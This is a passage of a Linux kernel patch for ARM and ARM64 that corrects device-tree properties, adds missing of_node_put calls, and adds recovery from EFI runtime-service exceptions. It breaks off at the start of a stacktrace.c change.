++++ b/arch/arm/boot/dts/imx7d-pico-nymph.dts
+@@ -43,7 +43,7 @@
+ };
+ 
+ &i2c1 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+@@ -64,7 +64,7 @@
+ };
+ 
+ &i2c2 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c2>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/sam9x60.dtsi b/arch/arm/boot/dts/sam9x60.dtsi
+index 8f5477e307dd4..37a5d96aaf642 100644
+--- a/arch/arm/boot/dts/sam9x60.dtsi
++++ b/arch/arm/boot/dts/sam9x60.dtsi
+@@ -564,7 +564,7 @@
+ 			mpddrc: mpddrc@ffffe800 {
+ 				compatible = "microchip,sam9x60-ddramc", "atmel,sama5d3-ddramc";
+ 				reg = <0xffffe800 0x200>;
+-				clocks = <&pmc PMC_TYPE_SYSTEM 2>, <&pmc PMC_TYPE_CORE PMC_MCK>;
++				clocks = <&pmc PMC_TYPE_SYSTEM 2>, <&pmc PMC_TYPE_PERIPHERAL 49>;
+ 				clock-names = "ddrck", "mpddr";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi b/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
+index d865ab5d866b9..dd23de85100c4 100644
+--- a/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
++++ b/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
+@@ -101,8 +101,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+index 30156b7546ed6..d540550f7da26 100644
+--- a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+@@ -391,8 +391,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+index 238a611192e72..d3b85a8764d74 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+@@ -428,8 +428,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+index 134a798ad3f23..bb40fb46da81d 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+@@ -247,8 +247,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x200000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/mach-imx/cpu-imx25.c b/arch/arm/mach-imx/cpu-imx25.c
+index 3e63445cde062..cc86977d0a340 100644
+--- a/arch/arm/mach-imx/cpu-imx25.c
++++ b/arch/arm/mach-imx/cpu-imx25.c
+@@ -23,6 +23,7 @@ static int mx25_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx25-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 	rev = readl(iim_base + MXC_IIMSREV);
+ 	iounmap(iim_base);
+diff --git a/arch/arm/mach-imx/cpu-imx27.c b/arch/arm/mach-imx/cpu-imx27.c
+index bf70e13bbe9ee..1d28939083683 100644
+--- a/arch/arm/mach-imx/cpu-imx27.c
++++ b/arch/arm/mach-imx/cpu-imx27.c
+@@ -28,6 +28,7 @@ static int mx27_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx27-ccm");
+ 	ccm_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!ccm_base);
+ 	/*
+ 	 * now we have access to the IO registers. As we need
+diff --git a/arch/arm/mach-imx/cpu-imx31.c b/arch/arm/mach-imx/cpu-imx31.c
+index b9c24b851d1ab..35c544924e509 100644
+--- a/arch/arm/mach-imx/cpu-imx31.c
++++ b/arch/arm/mach-imx/cpu-imx31.c
+@@ -39,6 +39,7 @@ static int mx31_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx31-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 
+ 	/* read SREV register from IIM module */
+diff --git a/arch/arm/mach-imx/cpu-imx35.c b/arch/arm/mach-imx/cpu-imx35.c
+index 80e7d8ab9f1bb..1fe75b39c2d99 100644
+--- a/arch/arm/mach-imx/cpu-imx35.c
++++ b/arch/arm/mach-imx/cpu-imx35.c
+@@ -21,6 +21,7 @@ static int mx35_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx35-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 
+ 	rev = imx_readl(iim_base + MXC_IIMSREV);
+diff --git a/arch/arm/mach-imx/cpu-imx5.c b/arch/arm/mach-imx/cpu-imx5.c
+index ad56263778f93..a67c89bf155dd 100644
+--- a/arch/arm/mach-imx/cpu-imx5.c
++++ b/arch/arm/mach-imx/cpu-imx5.c
+@@ -28,6 +28,7 @@ static u32 imx5_read_srev_reg(const char *compat)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, compat);
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	WARN_ON(!iim_base);
+ 
+ 	srev = readl(iim_base + IIM_SREV) & 0xff;
+diff --git a/arch/arm/mm/nommu.c b/arch/arm/mm/nommu.c
+index c1494a4dee25b..53f2d8774fdb9 100644
+--- a/arch/arm/mm/nommu.c
++++ b/arch/arm/mm/nommu.c
+@@ -161,7 +161,7 @@ void __init paging_init(const struct machine_desc *mdesc)
+ 	mpu_setup();
+ 
+ 	/* allocate the zero page. */
+-	zero_page = memblock_alloc(PAGE_SIZE, PAGE_SIZE);
++	zero_page = (void *)memblock_alloc(PAGE_SIZE, PAGE_SIZE);
+ 	if (!zero_page)
+ 		panic("%s: Failed to allocate %lu bytes align=0x%lx\n",
+ 		      __func__, PAGE_SIZE, PAGE_SIZE);
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
+index 03266bd90a06b..169f047fbca50 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
+@@ -120,7 +120,7 @@
+ &ecspi2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_espi2>;
+-	cs-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
++	cs-gpios = <&gpio5 13 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	eeprom@0 {
+@@ -316,7 +316,7 @@
+ 			MX8MM_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK		0x82
+ 			MX8MM_IOMUXC_ECSPI2_MOSI_ECSPI2_MOSI		0x82
+ 			MX8MM_IOMUXC_ECSPI2_MISO_ECSPI2_MISO		0x82
+-			MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x41
++			MX8MM_IOMUXC_ECSPI2_SS0_GPIO5_IO13              0x41
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+index d3ee6fc4baabd..72311b55f06da 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+@@ -759,6 +759,7 @@
+ &usbotg2 {
+ 	dr_mode = "host";
+ 	vbus-supply = <&reg_usb2_vbus>;
++	over-current-active-low;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
+index c2a5c2f7b204b..7c3f5c54f0400 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
+@@ -9,6 +9,7 @@
+ 		simple-audio-card,bitclock-master = <&dailink_master>;
+ 		simple-audio-card,format = "i2s";
+ 		simple-audio-card,frame-master = <&dailink_master>;
++		simple-audio-card,mclk-fs = <256>;
+ 		simple-audio-card,name = "imx8mm-wm8904";
+ 		simple-audio-card,routing =
+ 			"Headphone Jack", "HPOUTL",
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
+index 73cc3fafa0180..b2bcd22821702 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
+@@ -11,6 +11,7 @@
+ 		simple-audio-card,bitclock-master = <&dailink_master>;
+ 		simple-audio-card,format = "i2s";
+ 		simple-audio-card,frame-master = <&dailink_master>;
++		simple-audio-card,mclk-fs = <256>;
+ 		simple-audio-card,name = "imx8mm-nau8822";
+ 		simple-audio-card,routing =
+ 			"Headphones", "LHP",
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-evk.dts b/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
+index b4c1ef2559f20..126c839b45f2d 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
+@@ -36,8 +36,8 @@
+ 
+ 	pcie0_refclk: pcie0-refclk {
+ 		compatible = "fixed-clock";
+-			#clock-cells = <0>;
+-			clock-frequency = <100000000>;
++		#clock-cells = <0>;
++		clock-frequency = <100000000>;
+ 	};
+ 
+ 	reg_can1_stby: regulator-can1-stby {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
+index 79b290a002c19..ecc4bce6db97c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
+@@ -99,7 +99,6 @@
+ 
+ 		regulators {
+ 			buck1: BUCK1 {
+-				regulator-compatible = "BUCK1";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <2187500>;
+ 				regulator-boot-on;
+@@ -108,7 +107,6 @@
+ 			};
+ 
+ 			buck2: BUCK2 {
+-				regulator-compatible = "BUCK2";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <2187500>;
+ 				regulator-boot-on;
+@@ -119,7 +117,6 @@
+ 			};
+ 
+ 			buck4: BUCK4 {
+-				regulator-compatible = "BUCK4";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -127,7 +124,6 @@
+ 			};
+ 
+ 			buck5: BUCK5 {
+-				regulator-compatible = "BUCK5";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -135,7 +131,6 @@
+ 			};
+ 
+ 			buck6: BUCK6 {
+-				regulator-compatible = "BUCK6";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -143,7 +138,6 @@
+ 			};
+ 
+ 			ldo1: LDO1 {
+-				regulator-compatible = "LDO1";
+ 				regulator-min-microvolt = <1600000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+@@ -151,7 +145,6 @@
+ 			};
+ 
+ 			ldo2: LDO2 {
+-				regulator-compatible = "LDO2";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <1150000>;
+ 				regulator-boot-on;
+@@ -159,7 +152,6 @@
+ 			};
+ 
+ 			ldo3: LDO3 {
+-				regulator-compatible = "LDO3";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+@@ -167,13 +159,11 @@
+ 			};
+ 
+ 			ldo4: LDO4 {
+-				regulator-compatible = "LDO4";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 			};
+ 
+ 			ldo5: LDO5 {
+-				regulator-compatible = "LDO5";
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index d944ecca1b3c2..47fd6a0ba05ad 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -523,6 +523,7 @@
+ 				compatible = "fsl,imx8mp-gpc";
+ 				reg = <0x303a0000 0x1000>;
+ 				interrupt-parent = <&gic>;
++				interrupts = <GIC_SPI 87 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-controller;
+ 				#interrupt-cells = <3>;
+ 
+@@ -589,7 +590,7 @@
+ 						reg = <IMX8MP_POWER_DOMAIN_MIPI_PHY2>;
+ 					};
+ 
+-					pgc_hsiomix: power-domains@17 {
++					pgc_hsiomix: power-domain@17 {
+ 						#power-domain-cells = <0>;
+ 						reg = <IMX8MP_POWER_DOMAIN_HSIOMIX>;
+ 						clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+index 69786c326db00..27f9a9f331346 100644
+--- a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+@@ -74,7 +74,7 @@
+ 
+ 	pinctrl_usdhc1: usdhc1grp {
+ 		fsl,pins = <
+-			MX93_PAD_SD1_CLK__USDHC1_CLK		0x17fe
++			MX93_PAD_SD1_CLK__USDHC1_CLK		0x15fe
+ 			MX93_PAD_SD1_CMD__USDHC1_CMD		0x13fe
+ 			MX93_PAD_SD1_DATA0__USDHC1_DATA0	0x13fe
+ 			MX93_PAD_SD1_DATA1__USDHC1_DATA1	0x13fe
+@@ -84,7 +84,7 @@
+ 			MX93_PAD_SD1_DATA5__USDHC1_DATA5	0x13fe
+ 			MX93_PAD_SD1_DATA6__USDHC1_DATA6	0x13fe
+ 			MX93_PAD_SD1_DATA7__USDHC1_DATA7	0x13fe
+-			MX93_PAD_SD1_STROBE__USDHC1_STROBE	0x17fe
++			MX93_PAD_SD1_STROBE__USDHC1_STROBE	0x15fe
+ 		>;
+ 	};
+ 
+@@ -102,7 +102,7 @@
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX93_PAD_SD2_CLK__USDHC2_CLK		0x17fe
++			MX93_PAD_SD2_CLK__USDHC2_CLK		0x15fe
+ 			MX93_PAD_SD2_CMD__USDHC2_CMD		0x13fe
+ 			MX93_PAD_SD2_DATA0__USDHC2_DATA0	0x13fe
+ 			MX93_PAD_SD2_DATA1__USDHC2_DATA1	0x13fe
+diff --git a/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi b/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
+index 44ed6f963b75a..8e2ac687a410b 100644
+--- a/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
++++ b/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
+@@ -97,7 +97,7 @@
+ 
+ 			uart1: serial@12100 {
+ 				compatible = "snps,dw-apb-uart";
+-				reg = <0x11000 0x100>;
++				reg = <0x12100 0x100>;
+ 				reg-shift = <2>;
+ 				interrupts = <GIC_SPI 84 IRQ_TYPE_LEVEL_HIGH>;
+ 				reg-io-width = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+index c4e87d0aec42f..3ab0ad14e8704 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+@@ -11,6 +11,12 @@
+ #include <dt-bindings/gpio/gpio.h>
+ #include <dt-bindings/input/gpio-keys.h>
+ 
++/delete-node/ &adsp_mem;
++/delete-node/ &audio_mem;
++/delete-node/ &mpss_mem;
++/delete-node/ &peripheral_region;
++/delete-node/ &rmtfs_mem;
++
+ / {
+ 	model = "Xiaomi Mi 4C";
+ 	compatible = "xiaomi,libra", "qcom,msm8992";
+@@ -70,25 +76,67 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* This is for getting crash logs using Android downstream kernels */
+-		ramoops@dfc00000 {
+-			compatible = "ramoops";
+-			reg = <0x0 0xdfc00000 0x0 0x40000>;
+-			console-size = <0x10000>;
+-			record-size = <0x10000>;
+-			ftrace-size = <0x10000>;
+-			pmsg-size = <0x20000>;
++		memory_hole: hole@6400000 {
++			reg = <0 0x06400000 0 0x600000>;
++			no-map;
++		};
++
++		memory_hole2: hole2@6c00000 {
++			reg = <0 0x06c00000 0 0x2400000>;
++			no-map;
++		};
++
++		mpss_mem: mpss@9000000 {
++			reg = <0 0x09000000 0 0x5a00000>;
++			no-map;
++		};
++
++		tzapp: tzapp@ea00000 {
++			reg = <0 0x0ea00000 0 0x1900000>;
++			no-map;
++		};
++
++		mdm_rfsa_mem: mdm-rfsa@ca0b0000 {
++			reg = <0 0xca0b0000 0 0x10000>;
++			no-map;
++		};
++
++		rmtfs_mem: rmtfs@ca100000 {
++			compatible = "qcom,rmtfs-mem";
++			reg = <0 0xca100000 0 0x180000>;
++			no-map;
++
++			qcom,client-id = <1>;
+ 		};
+ 
+-		modem_region: modem_region@9000000 {
+-			reg = <0x0 0x9000000 0x0 0x5a00000>;
++		audio_mem: audio@cb400000 {
++			reg = <0 0xcb000000 0 0x400000>;
++			no-mem;
++		};
++
++		qseecom_mem: qseecom@cb400000 {
++			reg = <0 0xcb400000 0 0x1c00000>;
++			no-mem;
++		};
++
++		adsp_rfsa_mem: adsp-rfsa@cd000000 {
++			reg = <0 0xcd000000 0 0x10000>;
+ 			no-map;
+ 		};
+ 
+-		tzapp: modem_region@ea00000 {
+-			reg = <0x0 0xea00000 0x0 0x1900000>;
++		sensor_rfsa_mem: sensor-rfsa@cd010000 {
++			reg = <0 0xcd010000 0 0x10000>;
+ 			no-map;
+ 		};
++
++		ramoops@dfc00000 {
++			compatible = "ramoops";
++			reg = <0 0xdfc00000 0 0x40000>;
++			console-size = <0x10000>;
++			record-size = <0x10000>;
++			ftrace-size = <0x10000>;
++			pmsg-size = <0x20000>;
++		};
+ 	};
+ };
+ 
+@@ -130,11 +178,6 @@
+ 	status = "okay";
+ };
+ 
+-&peripheral_region {
+-	reg = <0x0 0x7400000 0x0 0x1c00000>;
+-	no-map;
+-};
+-
+ &pm8994_spmi_regulators {
+ 	VDD_APC0: s8 {
+ 		regulator-min-microvolt = <680000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992.dtsi b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+index 750643763a760..f4be09fc1b151 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+@@ -36,10 +36,6 @@
+ 	compatible = "qcom,rpmcc-msm8992", "qcom,rpmcc";
+ };
+ 
+-&tcsr_mutex {
+-	compatible = "qcom,sfpb-mutex";
+-};
+-
+ &timer {
+ 	interrupts = <GIC_PPI 2 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_LOW)>,
+ 			     <GIC_PPI 3 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_LOW)>,
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 9f2a136d5cbc5..146a4285c3952 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1173,7 +1173,7 @@
+ 			clock-names = "aux", "ref_clk_src", "ref", "com_aux";
+ 
+ 			resets = <&gcc GCC_USB3_PHY_PRIM_BCR>,
+-				 <&gcc GCC_USB3_DP_PHY_PRIM_BCR>;
++				 <&gcc GCC_USB4_DP_PHY_PRIM_BCR>;
+ 			reset-names = "phy", "common";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index b9f3165075c9d..b13c22046de58 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -14,8 +14,16 @@
+ 
+ #ifdef CONFIG_EFI
+ extern void efi_init(void);
++
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg);
+ #else
+ #define efi_init()
++
++static inline
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg)
++{
++	return false;
++}
+ #endif
+ 
+ int efi_create_mapping(struct mm_struct *mm, efi_memory_desc_t *md);
+@@ -40,8 +48,17 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ })
+ 
+ extern spinlock_t efi_rt_lock;
++extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
++/*
++ * efi_rt_stack_top[-1] contains the value the stack pointer had before
++ * switching to the EFI runtime stack.
++ */
++#define current_in_efi()						\
++	(!preemptible() && efi_rt_stack_top != NULL &&			\
++	 on_task_stack(current, READ_ONCE(efi_rt_stack_top[-1]), 1))
++
+ #define ARCH_EFI_IRQ_FLAGS_MASK (PSR_D_BIT | PSR_A_BIT | PSR_I_BIT | PSR_F_BIT)
+ 
+ /*
+diff --git a/arch/arm64/include/asm/stacktrace.h b/arch/arm64/include/asm/stacktrace.h
+index 5a0edb064ea47..327cdcfcb1db0 100644
+--- a/arch/arm64/include/asm/stacktrace.h
++++ b/arch/arm64/include/asm/stacktrace.h
+@@ -104,4 +104,19 @@ static inline struct stack_info stackinfo_get_sdei_critical(void)
+ #define stackinfo_get_sdei_critical()	stackinfo_get_unknown()
+ #endif
+ 
++#ifdef CONFIG_EFI
++extern u64 *efi_rt_stack_top;
++
++static inline struct stack_info stackinfo_get_efi(void)
++{
++	unsigned long high = (u64)efi_rt_stack_top;
++	unsigned long low = high - THREAD_SIZE;
++
++	return (struct stack_info) {
++		.low = low,
++		.high = high,
++	};
++}
++#endif
++
+ #endif	/* __ASM_STACKTRACE_H */
+diff --git a/arch/arm64/kernel/efi-rt-wrapper.S b/arch/arm64/kernel/efi-rt-wrapper.S
+index 2d3c4b02393e4..e8ae803662cf1 100644
+--- a/arch/arm64/kernel/efi-rt-wrapper.S
++++ b/arch/arm64/kernel/efi-rt-wrapper.S
+@@ -7,7 +7,7 @@
+ #include <asm/assembler.h>
+ 
+ SYM_FUNC_START(__efi_rt_asm_wrapper)
+-	stp	x29, x30, [sp, #-32]!
++	stp	x29, x30, [sp, #-112]!
+ 	mov	x29, sp
+ 
+ 	/*
+@@ -17,11 +17,21 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 */
+ 	stp	x1, x18, [sp, #16]
+ 
++	/*
++	 * Preserve all callee saved registers and preserve the stack pointer
++	 * value at the base of the EFI runtime stack so we can recover from
++	 * synchronous exceptions occurring while executing the firmware
++	 * routines.
++	 */
++	stp	x19, x20, [sp, #32]
++	stp	x21, x22, [sp, #48]
++	stp	x23, x24, [sp, #64]
++	stp	x25, x26, [sp, #80]
++	stp	x27, x28, [sp, #96]
++
+ 	ldr_l	x16, efi_rt_stack_top
+ 	mov	sp, x16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	str	x18, [sp, #-16]!
+-#endif
++	stp	x18, x29, [sp, #-16]!
+ 
+ 	/*
+ 	 * We are lucky enough that no EFI runtime services take more than
+@@ -36,10 +46,13 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	mov	x4, x6
+ 	blr	x8
+ 
++	mov	x16, sp
+ 	mov	sp, x29
++	str	xzr, [x16, #8]			// clear recorded task SP value
++
+ 	ldp	x1, x2, [sp, #16]
+ 	cmp	x2, x18
+-	ldp	x29, x30, [sp], #32
++	ldp	x29, x30, [sp], #112
+ 	b.ne	0f
+ 	ret
+ 0:
+@@ -57,3 +70,18 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 
+ 	b	efi_handle_corrupted_x18	// tail call
+ SYM_FUNC_END(__efi_rt_asm_wrapper)
++
++SYM_CODE_START(__efi_rt_asm_recover)
++	mov	sp, x30
++
++	ldr_l	x16, efi_rt_stack_top		// clear recorded task SP value
++	str	xzr, [x16, #-8]
++
++	ldp	x19, x20, [sp, #32]
++	ldp	x21, x22, [sp, #48]
++	ldp	x23, x24, [sp, #64]
++	ldp	x25, x26, [sp, #80]
++	ldp	x27, x28, [sp, #96]
++	ldp	x29, x30, [sp], #112
++	ret
++SYM_CODE_END(__efi_rt_asm_recover)
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index 386bd81ca12bb..b273900f45668 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -11,6 +11,7 @@
+ #include <linux/init.h>
+ 
+ #include <asm/efi.h>
++#include <asm/stacktrace.h>
+ 
+ static bool region_is_misaligned(const efi_memory_desc_t *md)
+ {
+@@ -149,6 +150,28 @@ DEFINE_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
++asmlinkage efi_status_t __efi_rt_asm_recover(void);
++
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg)
++{
++	 /* Check whether the exception occurred while running the firmware */
++	if (!current_in_efi() || regs->pc >= TASK_SIZE_64)
++		return false;
++
++	pr_err(FW_BUG "Unable to handle %s in EFI runtime service\n", msg);
++	add_taint(TAINT_FIRMWARE_WORKAROUND, LOCKDEP_STILL_OK);
++	clear_bit(EFI_RUNTIME_SERVICES, &efi.flags);
++
++	regs->regs[0]	= EFI_ABORTED;
++	regs->regs[30]	= efi_rt_stack_top[-1];
++	regs->pc	= (u64)__efi_rt_asm_recover;
++
++	if (IS_ENABLED(CONFIG_SHADOW_CALL_STACK))
++		regs->regs[18] = efi_rt_stack_top[-2];
++
++	return true;
++}
++
+ /* EFI requires 8 KiB of stack space for runtime services */
+ static_assert(THREAD_SIZE >= SZ_8K);
+ 
+diff --git a/arch/arm64/kernel/stacktrace.c b/arch/arm64/kernel/stacktrace.c
+index 117e2c180f3c7..83154303e682c 100644
+--- a/arch/arm64/kernel/stacktrace.c
